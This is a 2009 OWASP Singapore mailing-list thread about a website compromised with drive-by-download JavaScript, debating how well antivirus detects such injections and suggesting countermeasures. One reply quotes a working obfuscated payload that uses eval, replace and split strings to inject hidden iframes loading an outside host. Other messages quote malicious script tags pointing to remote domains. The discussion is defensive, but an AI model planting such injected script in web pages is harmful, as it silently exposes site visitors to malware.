[Owasp-singapore] [security-77] viewerschoice.com.sg

Wong Onn Chee ocwong at usa.net
Tue Aug 25 22:10:50 EDT 2009


Hi Aung,

Good feedback.

A further question on the effectiveness of server-side AV.

With reference to Knowsec's, a well-known Chinese company, database of
infected Chinese sites, can server-side AV block those listed at
http://www.scanw.com/blog/archives/date/2009/08 ?

Examples of malicious links:

a) <script src=http://click.cwebgame.com/api.js></script>

b) <script type=”text/javascript” language=”JavaScript”
src=”http://0810%2E6600%2Eorg” id=”seraph3script6243″  ></script>

c) <script language=”JavaScript” type=”text/javascript”
src=”http://c0812.2288.%6Frg” id=”seraph4script6785″  ></script>

d) http://bbs.gamespot.com.cn/include/js/common.js


I am very curious as to how server-side AV can block these effectively
without generating too many false positives.


On 08/26/2009 02:02 AM, Aung Khant wrote:
> I've handled this type of incident a couple of times.
>
> Server-side AV software is not useless and it can detect well-known
> injected strings.
> The administrator should schedule the  daily update and scan, which
> causes server overhead for hundred of web sites.
> Also this is a huge need to analyze found malwares for false
> positives, which makes server AV software not able to delete/remove
> anything they have found.
> Due to this, you'll never see AV scanners (daily scan) in web server
> environments till a malicious virus spread occurs.
>
> Client-side AV can be effective for well-known injected strings.
>
> But not all AV can detect such. You can check it out by saving the
> following sample as a text file and submitting to virustotal.com
> <http://virustotal.com>.
>
> <script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@&
> (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!%
> $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@&
> [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig,
> ""))</script><script>document.write("<if"+''+'ra'+''+"m"+'e
> s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\"
> wid"+''+'th=1
> he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.write("<if"+'ra'+"m"+'e
> s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\"
> wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script>
>
> The main reason why JavaScript malware injection is always successful
> at attackers' heart is that
> AV softwares today lack JavaScript emulation engine (as far as I know)
> for malware analysis.
> Most use signatures. Most run at default - lowest heuristic settings.
> I've made a demo movie here:
> http://yehg.net/lab/pr0js/files.php/DefeatingSignature-BasedAVScanners.zip
>
>
> Causes:
> ==========
>
> There is a number of possible causes - security weaknesses on the target.
> Common are insecure server configurations (Application/Web/Database),
> web applications and weak FTP passwords.
>
>
> Counter-measures
> =============
>
> It's all security hardening/patching/monitoring. There is nothing more
> to say.
>
> So, what about against z-day exploits ?
>
> A lot of security companies have launched remote malware monitoring
> sevice:
> http://www.google.com.sg/search?q=malware+monitoring+service
> A well-known one is http://hackalert.armorize.com/
> A cheap solution is that you can write a script/software to
> periodically search "This site may harm ..." in  Google search term
> with your site.
>
> Again, they all have limitations like AV softwares. They detect only
> known injections.
> But you'll be notified as soon as injection occurs via periodic scans,
> which gives you
> time to save from Google Blacklisting. ()
>
> What about other tricks you can use?
>
> - You can periodically scan files for injection with clean md5 hash
> database like what Tripwire does.
> - You can encrypt server-side files (aspx,php..etc) which contains
> self-md5 checking that automatically
>    mail/sms you  If mismatch is found. For this, you have to use a
> (commercial) source code encrypter.
>
>
> You can individually feel free to contact & get help from me.
>
>
> On Tue, Aug 25, 2009 at 10:00 PM, Wong Onn Chee <ocwong at usa.net
> <mailto:ocwong at usa.net>> wrote:
>
>     Again, on this topic.
>     This case is similar to the one suffered by websites of UniSIM,
>     Fiat SG and Popular Bookstore.
>
>     I will like to seek feedback from the group on how you will
>     address such a scenario:
>
>     That the web server is infected with malicious Javascript which
>     does not affect the infected web server, but affects all visitors
>     to the site by tricking them to download and install malware which
>     is hosted elsewhere.
>
>     Let's assume the following:
>
>     1) Server-side AV software is useless here as the malware is not
>     on the affected web server.
>     2) Client-side AV software is not effective if the malware could
>     be a zero-day exploit.
>     (The successful infection of UniSIM students in Jan this year
>     shows that client-side AV is not foolproof.)
>
>     There are tons of ways for the malicious Javascript to get into
>     the affected web server.
>     Feel free to propose the possible causes and the relevant
>     counter-measures.
>
>     Let's get creative! :-)
>
>
>
>     On 08/25/2009 10:11 PM, Johnny Wong wrote:
>>     Was there a preceding email? I can't seem to see the initiating
>>     email.
>>
>>     At 09:26 PM 25-08-09, you wrote:
>>>     Was trying to browse to the site ..
>>>
>>>       Any stats on how many Singapore websites are affected by such
>>>     drive-by downloads?
>>>
>>>
>>>         *Safe Browsing*
>>>
>>>
>>>
>>>
>>>           *Diagnostic page for www.viewerschoice.com.sg
>>>           <http://www.viewerschoice.com.sg>*
>>>
>>>
>>>
>>>     *What is the current listing status for www.viewerschoice.com.sg
>>>     <http://www.viewerschoice.com.sg> ?
>>>     *
>>>
>>>
>>>         Site is listed as suspicious - visiting this web site may
>>>         harm your computer.
>>>
>>>         Part of this site was listed for suspicious activity 2
>>>         time(s) over the past 90 days.
>>>
>>>     What happened when Google visited this site?
>>>
>>>         Of the 120 pages we tested on the site over the past 90
>>>         days, 8 page(s) resulted in malicious software being
>>>         downloaded and installed without user consent. The last time
>>>         Google visited this site was on 2009-08-21, and the last
>>>         time suspicious content was found on this site was on
>>>         2009-08-21.
>>>
>>>         Malicious software is hosted on 3 domain(s), including
>>>         a5m.ru/
>>>         <http://www.google.com/safebrowsing/diagnostic?site=a5m.ru/&hl=en>,
>>>         lotbetsite.cn/
>>>         <http://www.google.com/safebrowsing/diagnostic?site=lotbetsite.cn/&hl=en>,
>>>         bigtopleads.cn/
>>>         <http://www.google.com/safebrowsing/diagnostic?site=bigtopleads.cn/&hl=en>.
>>>
>>>         This site was hosted on 2 network(s) including AS4628
>>>         (PACIFIC)
>>>         <http://www.google.com/safebrowsing/diagnostic?site=AS:4628&hl=en>,
>>>         AS15169 (GOOGLE)
>>>         <http://www.google.com/safebrowsing/diagnostic?site=AS:15169&hl=en>.
>>>
>>>     Has this site acted as an intermediary resulting in further
>>>     distribution of malware?
>>>
>>>
>>>         Over the past 90 days, www.viewerschoice.com.sg
>>>         <http://www.viewerschoice.com.sg> did not appear to function
>>>         as an intermediary for the infection of any sites.
>>>
>>>     Has this site hosted malware?
>>>
>>>
>>>         No, this site has not hosted malicious software over the
>>>         past 90 days.
>>>
>>>     How did this happen?
>>>
>>>
>>>         In some cases, third parties can add malicious code to
>>>         legitimate sites, which would cause us to show the warning
>>>         message.
>>>
>>>     Next steps:
>>>
>>>         * Return to the previous page.
>>>           <http://www.google.com/safebrowsing/diagnostic?site=http://www.viewerschoice.com.sg/&hl=en#>
>>>
>>>         * If you are the owner of this web site, you can request a
>>>           review of your site using Google Webmaster Tools
>>>           <http://www.google.com/webmasters/tools/>. More
>>>           information about the review process is available in
>>>           Google's Webmaster Help Center
>>>           <http://www.google.com/support/webmasters/bin/answer.py?answer=45432>.
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>     --
>>>     Please Note: If you hit "REPLY", your message will be sent to
>>>     everyone on this mailing list (security-77 at meetup.com
>>>     <mailto:security-77 at meetup.com>)
>>>     This message was sent by kianjui (kianjui at gmail.com
>>>     <mailto:kianjui at gmail.com>) from The Singapore Security Meetup
>>>     Group <http://www.meetup.com/SGSecurityMG/>.
>>>     To learn more about kianjui, visit his/her member profile
>>>     <http://www.meetup.com/SGSecurityMG/members/10170594/>
>>>     To unsubscribe or to update your mailing list settings, click
>>>     here <http://www.meetup.com/account/comm/>
>>>
>>>     Meetup Support: support at meetup.com <mailto:support at meetup.com>
>>>     632 Broadway, New York, NY 10012 USA 
>>
>>
>>
>>
>>     --
>>     Please Note: If you hit "*REPLY*", your message will be sent to
>>     *everyone* on this mailing list (security-77 at meetup.com
>>     <mailto:security-77 at meetup.com>)
>>     This message was sent by Johnny Wong (johnnywkm at gmail.com
>>     <mailto:johnnywkm at gmail.com>) from The Singapore Security Meetup
>>     Group <http://www.meetup.com/SGSecurityMG/>.
>>     To learn more about Johnny Wong, visit his/her member profile
>>     <http://www.meetup.com/SGSecurityMG/members/5695170/>
>>     To unsubscribe or to update your mailing list settings, click
>>     here <http://www.meetup.com/account/comm/>
>>
>>     Meetup Support: support at meetup.com <mailto:support at meetup.com>
>>     632 Broadway, New York, NY 10012 USA 
>
>
>
>
>     --
>     Please Note: If you hit "*REPLY*", your message will be sent to
>     *everyone* on this mailing list (security-77 at meetup.com
>     <mailto:security-77 at meetup.com>)
>     This message was sent by Wong Onn Chee (ocwong at usa.net
>     <mailto:ocwong at usa.net>) from The Singapore Security Meetup Group
>     <http://www.meetup.com/SGSecurityMG/>.
>     To learn more about Wong Onn Chee, visit his/her member profile
>     <http://www.meetup.com/SGSecurityMG/members/1756147/>
>     To unsubscribe or to update your mailing list settings, click here
>     <http://www.meetup.com/account/comm/>
>
>     Meetup Support: support at meetup.com <mailto:support at meetup.com>
>     632 Broadway, New York, NY 10012 USA
>
>
>
>
> -- 
> Best Regards
> YGN Ethical Hacker Group
> http://yehg.net
>
>
>
>
>
> --
> Please Note: If you hit "*REPLY*", your message will be sent to
> *everyone* on this mailing list (security-77 at meetup.com
> <mailto:security-77 at meetup.com>)
> This message was sent by Aung Khant (aungkhant at yehg.net) from The
> Singapore Security Meetup Group <http://www.meetup.com/SGSecurityMG/>.
> To learn more about Aung Khant, visit his/her member profile
> <http://www.meetup.com/SGSecurityMG/members/8456195/>
> To unsubscribe or to update your mailing list settings, click here
> <http://www.meetup.com/account/comm/>
>
> Meetup Support: support at meetup.com
> 632 Broadway, New York, NY 10012 USA 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/mailman/private/owasp-singapore/attachments/20090826/10291d16/attachment-0001.html 


More information about the Owasp-singapore mailing list